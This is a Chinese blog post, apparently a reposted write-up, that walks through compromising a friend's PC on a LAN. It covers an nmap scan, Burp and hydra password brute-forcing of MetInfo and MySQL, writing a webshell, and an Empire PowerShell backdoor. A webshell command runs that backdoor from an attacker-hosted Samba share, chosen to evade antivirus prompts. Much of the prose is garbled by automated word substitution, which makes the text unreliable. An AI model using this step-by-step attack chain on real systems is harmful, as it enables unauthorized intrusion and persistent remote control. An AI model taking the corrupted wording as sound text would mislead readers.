快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

一次友爱的渗透排泄测试

*

那天去参加了FreeTalk2018的线下活动,还不错哈哈,也希翼多弄几场如许的活动,作为小白的我照样无比渴望看到种种大佬的表演,听到FreeBuf小姐姐说提问问题有小礼品我刹时就两眼发光,谁人FreeBuf纪念品照样无比不错的,然则我每一次都把手举得高高的,全程估计就我举的次数至多了,小姐姐照样没有鸣到我…..我就不得不吐槽一下了。

u=2809942597,1539975396&fm=27&gp=0.jpg

好了言回正传,事情是如许的这两天暂(wu)时(jia)借(ke)宿(gui)在一个同伙家,他近来在自学php,我就是嘴贱跟他提了一嘴metinfo之前的一个getshell漏洞,效果非要缠着我让我演示一下怎么通过web得到目标权限…..哎算了算了,就当普及了一下安全知识把

丑化说才前面,我是个菜鸡万一我拿不了你电脑的权限,你就当我没跟你说过

因而我让他关上平时的开发环境把电脑放在一旁来配合我表演,

ps:我没见过他电脑所以并不清楚他目标电脑的一些信息 

搜集信息,初探目标

nmap -A 192.168.1.1/24

我连接上wifi以后使用上述命令对局域网进行了扫描,发现全部局域网除路由器外有五个设备,两个智能手机,三个pc我很快通过Nmap的返归效果锁定了他的计算机

2018-05-23 22-20-50屏幕截图.png

从返归的效果看,该设备运行着http服务以及mysql服务,而且根目录没有首页导致列出了根目录,nmap对目标的os也只是给出了猜解概率,无非目测应该是windows10或者windows8操作体系且并没有什么可以行使的windows漏洞

我原先想直接走访对方的http服务,工控黑客 ,但我想从实战的角度出发,所以我绝可能用上了一些愈加隐蔽或者迷惑的伎俩,

 我使用了一款火狐的插件,修改了X-FORWARD参数以及User-Agent的内容以便愈加具有迷惑性。

2018-05-23 23-11-06屏幕截图.png

以后走访发现对方的根目录有以下几个文件

2018-05-24 23-35-46屏幕截图.png

经过查看发现目标装置了metinfo以及官方演示页面版本是6.0,除了metinfo以及phpmyadmin可以行使之外其他的文件没有什么价值,尝试对后台暗码以及phpmyadmin进行猜解无果…..

哎,没什么思路只能使用下下策来暴力破解了,这玩意儿成不成功真是凭运气运限的,当然起首得有字典,这里我使用的是本人平时网络的弱口令字典

关上burp配置完阅读器代办署理,这里破解就直接放图了,懒得打字了。

1.png

点击Clear清除不需要爆破的参值

2.png

选择爆破的参数点击add&
3.png4.png选择暗码字典

5.png最先爆破

6.png

守候了三分钟左右,没有爆破到暗码,这时辰候我的心里是崩溃的。。。然则我依然劝慰本人还有一个mysql可以做突破。

夺得权限,写入Shell

我用hydra又试了一波

hydra -l root -P pass.txt 192.168.1.137 mysql

hydra一个专业的爆破工具,不用我多说了把,

返归以下

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-05-24 20:51:31

[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)

[DATA] max 4 tasks per 1 server, overall 4 tasks, 269 login tries (l:1/p:269), ~68 tries per task

[DATA] attacking mysql://192.168.1.137:3306/

[3306][mysql] host: 192.168.1.137   login: root   password: 88888

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 2018-05-24 20:56:06

激动到无以言表…….

Linux下我不知道用什么工具遥程连接其它mysql,所以本人写了一个php用来连接到对方的数据库上,

QQ截图20180524222329.png2018-05-24 22-31-31屏幕截图.png

实在我并没有打算会写入成功,因为之前用mysql写shell的时辰经常会由于权限不足而不发写入….没办法运气运限就是好….

执行命令对webshell进行测试,成功获得权限,可以看到对方是win10操作体系,

QQ截图20180524225908.png

原先想继续深入一下植入一个持久天真性高的后门,然则我谁人哥们不同意….哎没办法为了继续写下去我搭建了一个跟他环境相似的捏造机来继续进行测试

绕过杀软,成功渗透排泄

目标机:windows7(将就用win7把,不去做win10了),已写入webshell,

起首我们得写入一个”靠谱点”的后门,web后门对于小我私人开发者来说天真性不高,因为我们并不知道人家什么时辰会关闭或启动php环境,

这时辰候我的思路是搭建一个同享,然后通过webshell来让目标执行我的后门文件,然而目标机器上是装有火绒杀毒软件的,我们在运行后门的同时还需要避免被杀软查杀而我这个菜鸡又不懂免杀…我没有效msf因为免杀性太差,想到用CHOAS的然则他功能不足,最后照样选择了Emprie一个基于powershell的渗透排泄测试框架。

vim /etc/samba/smb.conf

在设置文件最后添加

[share]

path=/root/Share #同享文件的路径,

available=yes

browsealbe=yes

writable=yes

public=yes

现在来创建同享文件夹,并赋予权限

mkdir Share

chmod 777 -R Share

service smbd start

现在就已经完成了以及windows同享文件了” \\ip_addr\file”

然后我们来装置empire,在终端输入下列内容

git clone https://github.com/EmpireProject/Empire.git

cd Empire-master

chmod +x setup/install.sh && ./setup/install.sh

chmod +x empire && ./empire

现在empire就已经跑起来了

ps:我之所以使用empire,是因为要是直接通过webshell执行一个exe文件会出被讯问是否执行未知来源的程序,这不就尴尬了么…..,但经过我的测试发现要是是bat文件则会直接运行不会讯问如图

经过测试:windows7,windows10都有这类特性,其他windows体系自行测试(邪笑),

现在我们用empire生成一个基于powershell http的后门,输入

liststener

uselistener http

info  #查看可用参数

我在这里只简单的配置一下参数,其他的可用根据需要自行配置

set Host 192.168.1.123 #指向攻击者ip

execute  #启动监听

launcher powershell  #生成

2018-05-26 20-53-55屏幕截图.png

执行后会终端会输出一些经过处理的代码,直接粘贴到文本保存为bat格式即可

然后把bat文件扔进创建的同享里,我这里后门路径是/root/Share/test/backdoor.bat

然后在webshell中提交以下

http://192.168.1.143/?cmd=start \\192.168.1.123\Share\test\backdoor.bat

执行成功后empire会得到一个会话,也就证实我们完全掌控了目标的操作体系,

agents命令可以跳转到会话菜单,list命令可以列出所有会话

2018-05-26 22-04-54屏幕截图.png

而且powershell后门不比传统的exe后门,所以生成的后门是具有一定免杀结果的,如图,在这里我就不一一测试其他杀毒软件了,怕捏造机死机….,

2018-05-26 21-44-50屏幕截图.png

ps:要是在我发稿以后该后门对火绒免杀性失效了,那我就已经给火绒奉献了两个样本了,^_^也算是为收集安全出力了,哈哈哈(逃~~)

empire本身也有很多很故意思的模块,这个功能强盛的渗透排泄框架人人本人可以去探索,时间缘故起因我在这里就不久不多先容了。

中间文章写到一半不小心把阅读器关了,靠没有保存我又重新写了一遍,复查文章又误关了标签….大写的崩溃,文章写的不是很好,然则我尽对付出了心血,谢谢!!!

*

您可能还会对下面的文章感兴趣: